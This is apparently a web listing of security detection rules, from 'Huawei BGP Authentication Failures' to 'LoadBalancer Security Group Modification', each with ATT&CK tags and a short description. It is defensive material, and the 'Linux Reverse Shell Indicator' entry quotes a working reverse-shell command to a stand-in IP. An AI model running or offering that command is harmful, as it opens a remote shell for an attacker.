Share on:

Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.

Read More
Huawei BGP Authentication Failures

Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557 ·
Share on:

Detects BGP failures which may be indicative of brute force attacks to manipulate routing.

Read More
HybridConnectionManager Service Installation

Aug 12, 2024 · attack.persistence attack.t1554 ·
Share on:

Rule to detect the Hybrid Connection Manager service installation.

Read More
HybridConnectionManager Service Installation - Registry

Aug 12, 2024 · attack.resource-development attack.t1608 ·
Share on:

Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

Read More
HybridConnectionManager Service Running

Aug 12, 2024 · attack.persistence attack.t1554 ·
Share on:

Rule to detect the Hybrid Connection Manager service running on an endpoint.

Read More
Hypervisor Enforced Code Integrity Disabled

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel

Read More
Hypervisor Enforced Paging Translation Disabled

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.

Read More
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID

Read More
IE Change Domain Zone

Aug 12, 2024 · attack.persistence attack.t1137 ·
Share on:

Hides the file extension through modification of the registry

Read More
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Read More
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

Aug 12, 2024 · attack.execution attack.defense-evasion ·
Share on:

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Read More
Ie4uinit Lolbin Use From Invalid Path

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories

Read More
IIS Native-Code Module Command Line Installation

Aug 12, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Detects suspicious IIS native-code module installations via command line

Read More
IIS WebServer Access Logs Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1070 ·
Share on:

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

Read More
ImagingDevices Unusual Parent/Child Processes

Aug 12, 2024 · attack.defense-evasion attack.execution ·
Share on:

Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity

Read More
Impacket PsExec Execution

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

Detects execution of Impacket's psexec.py.

Read More
Import LDAP Data Interchange Format File Via Ldifde.EXE

Aug 12, 2024 · attack.command-and-control attack.defense-evasion attack.t1218 attack.t1105 ·
Share on:

Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.

Read More
Import PowerShell Modules From Suspicious Directories

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects powershell scripts that import modules from suspicious directories

Read More
Import PowerShell Modules From Suspicious Directories - ProcCreation

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects powershell scripts that import modules from suspicious directories

Read More
Important Scheduled Task Deleted

Aug 12, 2024 · attack.impact attack.t1489 ·
Share on:

Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Read More
Important Scheduled Task Deleted/Disabled

Aug 12, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 ·
Share on:

Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

Read More
Important Windows Event Auditing Disabled

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

Read More
Important Windows Service Terminated Unexpectedly

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects important or interesting Windows services that got terminated unexpectedly.

Read More
Important Windows Service Terminated With Error

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects important or interesting Windows services that got terminated for whatever reason

Read More
Imports Registry Key From a File

Aug 12, 2024 · attack.t1112 attack.defense-evasion ·
Share on:

Detects the import of the specified file to the registry with regedit.exe.

Read More
Imports Registry Key From an ADS

Aug 12, 2024 · attack.t1112 attack.defense-evasion ·
Share on:

Detects the import of a alternate datastream to the registry with regedit.exe.

Read More
Impossible Travel

Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access ·
Share on:

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

Read More
Increased Failed Authentications Of Any Type

Aug 12, 2024 · attack.defense-evasion attack.t1078 ·
Share on:

Detects when sign-ins increased by 10% or greater.

Read More
Indicator Removal on Host - Clear Mac System Logs

Aug 12, 2024 · attack.defense-evasion attack.t1070.002 ·
Share on:

Detects deletion of local audit logs

Read More
Indirect Command Execution By Program Compatibility Wizard

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution ·
Share on:

Detect indirect command execution via Program Compatibility Assistant pcwrun.exe

Read More
Indirect Command Execution From Script File Via Bash.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Read More
Indirect Inline Command Execution Via Bash.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Read More
InfDefaultInstall.exe .inf Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

Read More
Ingress/Egress Security Group Modification

Aug 12, 2024 · attack.initial-access attack.t1190 ·
Share on:

Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.

Read More
Insecure Proxy/DOH Transfer Via Curl.EXE

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.

Read More
Insecure Transfer Via Curl.EXE

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of "curl.exe" with the "--insecure" flag.

Read More
Install New Package Via Winget Local Manifest

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059 ·
Share on:

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

Read More
Install Root Certificate

Aug 12, 2024 · attack.defense-evasion attack.t1553.004 ·
Share on:

Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

Read More
Installation of TeamViewer Desktop

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

TeamViewer_Desktop.exe is create during install

Read More
Interactive AT Job

Aug 12, 2024 · attack.privilege-escalation attack.t1053.002 ·
Share on:

Detects an interactive AT job, which may be used as a form of privilege escalation.

Read More
Interactive Bash Suspicious Children

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.004 attack.t1036 ·
Share on:

Detects suspicious interactive bash as a parent to rather uncommon child processes

Read More
Internet Explorer Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects modification of autostart extensibility point (ASEP) in registry.

Read More
Internet Explorer DisableFirstRunCustomize Enabled

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

Read More
Invalid PIM License

Aug 12, 2024 · attack.t1078 attack.persistence attack.privilege-escalation ·
Share on:

Identifies when an organization doesn't have the proper license for PIM and is out of compliance.

Read More
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

Aug 12, 2024 · attack.credential-access attack.t1003.003 ·
Share on:

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

Read More
Invoke-Obfuscation CLIP+ Launcher

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Clip.exe to execute PowerShell

Read More
Invoke-Obfuscation CLIP+ Launcher - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Clip.exe to execute PowerShell

Read More
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Clip.exe to execute PowerShell

Read More
Invoke-Obfuscation CLIP+ Launcher - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Clip.exe to execute PowerShell

Read More
Invoke-Obfuscation CLIP+ Launcher - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Clip.exe to execute PowerShell

Read More
Invoke-Obfuscation COMPRESS OBFUSCATION

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Read More
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Read More
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Read More
Invoke-Obfuscation COMPRESS OBFUSCATION - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Read More
Invoke-Obfuscation COMPRESS OBFUSCATION - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Read More
Invoke-Obfuscation Obfuscated IEX Invocation

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

Read More
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014

Read More
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below

Read More
Invoke-Obfuscation Obfuscated IEX Invocation - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

Read More
Invoke-Obfuscation Obfuscated IEX Invocation - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

Read More
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Read More
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Read More
Invoke-Obfuscation RUNDLL LAUNCHER - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Read More
Invoke-Obfuscation RUNDLL LAUNCHER - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Read More
Invoke-Obfuscation STDIN+ Launcher

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of stdin to execute PowerShell

Read More
Invoke-Obfuscation STDIN+ Launcher - Powershell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of stdin to execute PowerShell

Read More
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of stdin to execute PowerShell

Read More
Invoke-Obfuscation STDIN+ Launcher - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of stdin to execute PowerShell

Read More
Invoke-Obfuscation STDIN+ Launcher - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of stdin to execute PowerShell

Read More
Invoke-Obfuscation VAR+ Launcher

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Environment Variables to execute PowerShell

Read More
Invoke-Obfuscation VAR+ Launcher - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Environment Variables to execute PowerShell

Read More
Invoke-Obfuscation VAR+ Launcher - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Environment Variables to execute PowerShell

Read More
Invoke-Obfuscation VAR+ Launcher - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Environment Variables to execute PowerShell

Read More
Invoke-Obfuscation VAR+ Launcher - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated use of Environment Variables to execute PowerShell

Read More
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via VAR++ LAUNCHER

Read More
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via VAR++ LAUNCHER

Read More
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via VAR++ LAUNCHER

Read More
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via VAR++ LAUNCHER

Read More
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via VAR++ LAUNCHER

Read More
Invoke-Obfuscation Via Stdin

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via Stdin in Scripts

Read More
Invoke-Obfuscation Via Stdin - Powershell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via Stdin in Scripts

Read More
Invoke-Obfuscation Via Stdin - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via Stdin in Scripts

Read More
Invoke-Obfuscation Via Stdin - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via Stdin in Scripts

Read More
Invoke-Obfuscation Via Stdin - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via Stdin in Scripts

Read More
Invoke-Obfuscation Via Use Clip

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Clip.exe in Scripts

Read More
Invoke-Obfuscation Via Use Clip - Powershell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Clip.exe in Scripts

Read More
Invoke-Obfuscation Via Use Clip - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Clip.exe in Scripts

Read More
Invoke-Obfuscation Via Use Clip - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Clip.exe in Scripts

Read More
Invoke-Obfuscation Via Use Clip - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Clip.exe in Scripts

Read More
Invoke-Obfuscation Via Use MSHTA

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use MSHTA in Scripts

Read More
Invoke-Obfuscation Via Use MSHTA - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use MSHTA in Scripts

Read More
Invoke-Obfuscation Via Use MSHTA - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use MSHTA in Scripts

Read More
Invoke-Obfuscation Via Use MSHTA - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use MSHTA in Scripts

Read More
Invoke-Obfuscation Via Use MSHTA - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use MSHTA in Scripts

Read More
Invoke-Obfuscation Via Use Rundll32 - PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Rundll32 in Scripts

Read More
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Rundll32 in Scripts

Read More
Invoke-Obfuscation Via Use Rundll32 - Security

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Rundll32 in Scripts

Read More
Invoke-Obfuscation Via Use Rundll32 - System

Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001 ·
Share on:

Detects Obfuscated Powershell via use Rundll32 in Scripts

Read More
ISO File Created Within Temp Folders

Aug 12, 2024 · attack.initial-access attack.t1566.001 ·
Share on:

Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

Read More
ISO Image Mounted

Aug 12, 2024 · attack.initial-access attack.t1566.001 ·
Share on:

Detects the mount of an ISO image on an endpoint

Read More
ISO or Image Mount Indicator in Recent Files

Aug 12, 2024 · attack.initial-access attack.t1566.001 ·
Share on:

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

Read More
JAMF MDM Execution

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.

Read More
JAMF MDM Potential Suspicious Child Process

Aug 12, 2024 · attack.execution ·
Share on:

Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.

Read More
Java Payload Strings

Aug 12, 2024 · cve.2022-26134 cve.2021-26084 attack.initial-access attack.t1190 ·
Share on:

Detects possible Java payloads in web access logs

Read More
Java Running with Remote Debugging

Aug 12, 2024 · attack.t1203 attack.execution ·
Share on:

Detects a JAVA process running with remote debugging allowing more than just localhost to connect

Read More
JexBoss Command Sequence

Aug 12, 2024 · attack.execution attack.t1059.004 ·
Share on:

Detects suspicious command sequence that JexBoss

Read More
JNDIExploit Pattern

Aug 12, 2024 · attack.initial-access attack.t1190 ·
Share on:

Detects exploitation attempt using the JNDI-Exploit-Kit

Read More
JScript Compiler Execution

Aug 12, 2024 · attack.defense-evasion attack.t1127 ·
Share on:

Detects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.

Read More
Juniper BGP Missing MD5

Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557 ·
Share on:

Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.

Read More
JXA In-memory Execution Via OSAScript

Aug 12, 2024 · attack.t1059.002 attack.t1059.007 attack.execution ·
Share on:

Detects possible malicious execution of JXA in-memory via OSAScript

Read More
Kavremover Dropped Binary LOLBIN Usage

Aug 12, 2024 · attack.defense-evasion attack.t1127 ·
Share on:

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

Read More
KDC RC4-HMAC Downgrade CVE-2022-37966

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation

Read More
Kerberos Manipulation

Aug 12, 2024 · attack.credential-access attack.t1212 ·
Share on:

Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.

Read More
Kerberos Network Traffic RC4 Ticket Encryption

Aug 12, 2024 · attack.credential-access attack.t1558.003 ·
Share on:

Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting

Read More
KrbRelayUp Service Installation

Aug 12, 2024 · attack.privilege-escalation attack.t1543 ·
Share on:

Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)

Read More
Kubernetes Admission Controller Modification

Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007 ·
Share on:

Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.

Read More
Kubernetes CronJob/Job Modification

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution ·
Share on:

Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.

Read More
Kubernetes Rolebinding Modification

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects when a Kubernetes Rolebinding is created or modified.

Read More
Kubernetes Secrets Modified or Deleted

Aug 12, 2024 · attack.credential-access ·
Share on:

Detects when Kubernetes Secrets are Modified or Deleted.

Read More
Launch Agent/Daemon Execution Via Launchctl

Aug 12, 2024 · attack.execution attack.persistence attack.t1569.001 attack.t1543.001 attack.t1543.004 ·
Share on:

Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.

Read More
Launch-VsDevShell.PS1 Proxy Execution

Aug 12, 2024 · attack.defense-evasion attack.t1216.001 ·
Share on:

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

Read More
Lazarus Group Activity

Aug 12, 2024 · attack.g0032 attack.execution attack.t1059 detection.emerging-threats ·
Share on:

Detects different process execution behaviors as described in various threat reports on Lazarus group activity

Read More
Lazarus System Binary Masquerading

Aug 12, 2024 · attack.defense-evasion attack.t1036.005 detection.emerging-threats ·
Share on:

Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location

Read More
Legitimate Application Dropped Archive

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects programs on a Windows system that should not write an archive to disk

Read More
Legitimate Application Dropped Executable

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects programs on a Windows system that should not write executables to disk

Read More
Legitimate Application Dropped Script

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects programs on a Windows system that should not write scripts to disk

Read More
Leviathan Registry Key Activity

Aug 12, 2024 · attack.persistence attack.t1547.001 detection.emerging-threats ·
Share on:

Detects registry key used by Leviathan APT in Malaysian focused campaign

Read More
Linux Base64 Encoded Pipe to Shell

Aug 12, 2024 · attack.defense-evasion attack.t1140 ·
Share on:

Detects suspicious process command line that uses base64 encoded input for execution with a shell

Read More
Linux Base64 Encoded Shebang In CLI

Aug 12, 2024 · attack.defense-evasion attack.t1140 ·
Share on:

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

Read More
Linux Capabilities Discovery

Aug 12, 2024 · attack.collection attack.privilege-escalation attack.t1123 attack.t1548 ·
Share on:

Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.

Read More
Linux Command History Tampering

Aug 12, 2024 · attack.defense-evasion attack.t1070.003 ·
Share on:

Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".

Read More
Linux Crypto Mining Indicators

Aug 12, 2024 · attack.impact attack.t1496 ·
Share on:

Detects command line parameters or strings often used by crypto miners

Read More
Linux Crypto Mining Pool Connections

Aug 12, 2024 · attack.impact attack.t1496 ·
Share on:

Detects process connections to a Monero crypto mining pool

Read More
Linux Doas Conf File Creation

Aug 12, 2024 · attack.privilege-escalation attack.t1548 ·
Share on:

Detects the creation of doas.conf file in linux host platform.

Read More
Linux Doas Tool Execution

Aug 12, 2024 · attack.privilege-escalation attack.t1548 ·
Share on:

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

Read More
Linux Keylogging with Pam.d

Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1056.001 ·
Share on:

Detect attempt to enable auditing of TTY input

Read More
Linux Network Service Scanning - Auditd

Aug 12, 2024 · attack.discovery attack.t1046 ·
Share on:

Detects enumeration of local or remote network services.

Read More
Linux Package Uninstall

Aug 12, 2024 · attack.defense-evasion attack.t1070 ·
Share on:

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

Read More
Linux Recon Indicators

Aug 12, 2024 · attack.reconnaissance attack.t1592.004 attack.credential-access attack.t1552.001 ·
Share on:

Detects events with patterns found in commands used for reconnaissance on linux systems

Read More
Linux Remote System Discovery

Aug 12, 2024 · attack.discovery attack.t1018 ·
Share on:

Detects the enumeration of other remote systems.

Read More
Linux Reverse Shell Indicator

Aug 12, 2024 · attack.execution attack.t1059.004 ·
Share on:

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Read More
Linux Shell Pipe to Shell

Aug 12, 2024 · attack.defense-evasion attack.t1140 ·
Share on:

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

Read More
Linux Webshell Indicators

Aug 12, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Detects suspicious sub processes of web server processes

Read More
Live Memory Dump Using Powershell

Aug 12, 2024 · attack.t1003 ·
Share on:

Detects usage of a PowerShell command to dump the live memory of a Windows machine

Read More
LiveKD Driver Creation

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation ·
Share on:

Detects the creation of the LiveKD driver, which is used for live kernel debugging

Read More
LiveKD Driver Creation By Uncommon Process

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation ·
Share on:

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

Read More
LiveKD Kernel Memory Dump File Created

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation ·
Share on:

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

Read More
LoadBalancer Security Group Modification

Aug 12, 2024 · attack.initial-access attack.t1190 ·
Share on:

